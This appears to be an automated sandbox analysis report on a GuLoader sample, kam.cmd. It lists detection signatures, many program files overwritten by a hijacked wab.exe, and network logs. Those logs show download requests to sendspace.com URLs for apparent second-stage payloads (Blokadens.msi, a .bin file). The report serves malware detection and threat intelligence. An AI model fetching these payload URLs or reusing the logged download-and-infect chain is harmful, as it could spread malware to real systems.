Windows Analysis Report
kam.cmd

Overview

General Information

Sample name: kam.cmd
Analysis ID: 1446787
MD5: c32ba3b07c8f7fec2d3b665e6c7b721e
SHA1: b4b05b772cfa9350934afffc9dcd9dc97593978e
SHA256: 320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9
Tags: cmd

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.0% probability
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.4:50719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:50720 version: TLS 1.2
Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.2263492849.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2263492849.0000000006FB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2267497983.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2263492849.000000000700D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2267497983.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Joe Sandbox View IP Address: 104.21.28.80 104.21.28.80
Source: Joe Sandbox View IP Address: 69.31.136.57 69.31.136.57
Source: Joe Sandbox View IP Address: 69.31.136.53 69.31.136.53
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /pro/dl/uq21t8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dlpro/49f996627c0399c13e97a7cb372f855b/664f94d2/uq21t8/Blokadens.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs12n5.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pro/dl/6v0noo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dlpro/15f7659e72d924eaa8d6602ae7a3a179/664f950b/6v0noo/nNznaMdneHnj42.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n2.sendspace.comConnection: Keep-AliveCookie: SID=closeui34vo0u559s82bhev1m1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs12n5.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs13n2.sendspace.com
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1DDF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fs12n5.sendspace.com
Source: wab.exe, 0000000A.00000002.2759736787.00000000239A0000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2600669071.000001CB2C082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2261205376.000000000575A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2256558573.000000000484C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2256558573.00000000046F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2256558573.000000000484C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1DDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C011000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2256558573.00000000046F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1DDE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs12n5.sendspaX
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1DDE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1C4A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs12n5.sendspace.com
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1DDBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1DDE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1DDE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1C4A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs12n5.sendspace.com/dlpro/49f996627c0399c13e97a7cb372f855b/664f94d2/uq21t8/Blokadens.msi
Source: wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n2.sendspace.com/
Source: wab.exe, 0000000A.00000002.2744457018.00000000080E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2239862529.00000000080E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n2.sendspace.com/Vn
Source: wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n2.sendspace.com/dlpro/15f7659e72d924eaa8d6602ae7a3a179/664f950b/6v0noo/nNznaMdneHnj42.b
Source: wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n2.sendspace.com/om:443
Source: powershell.exe, 00000005.00000002.2256558573.000000000484C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1D471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2600669071.000001CB2C082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2261205376.000000000575A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
